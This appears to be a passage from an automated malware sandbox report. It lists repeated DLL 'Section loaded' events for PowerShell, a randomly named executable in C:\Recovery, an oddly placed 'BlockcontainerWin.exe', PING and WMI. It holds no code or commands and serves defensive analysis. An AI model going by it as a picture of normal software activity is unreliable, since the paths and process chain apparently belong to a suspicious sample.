Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: mscoree.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: kernel.appcore.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: version.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: uxtheme.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: windows.storage.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: wldp.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: profapi.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: cryptsp.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: rsaenh.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: cryptbase.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: sspicli.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: mscoree.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: kernel.appcore.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: version.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: uxtheme.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: windows.storage.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: wldp.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: profapi.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: cryptsp.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: rsaenh.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: cryptbase.dll
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: sspicli.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: mscoree.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: apphelp.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: version.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: wldp.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: profapi.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: sspicli.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: winnsi.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: rasman.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: rtutils.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: mswsock.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: winhttp.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: propsys.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: edputil.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: urlmon.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: iertutil.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: srvcli.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: netutils.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: wintypes.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: appresolver.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: slc.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: userenv.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: mscoree.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: version.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: wldp.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: profapi.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
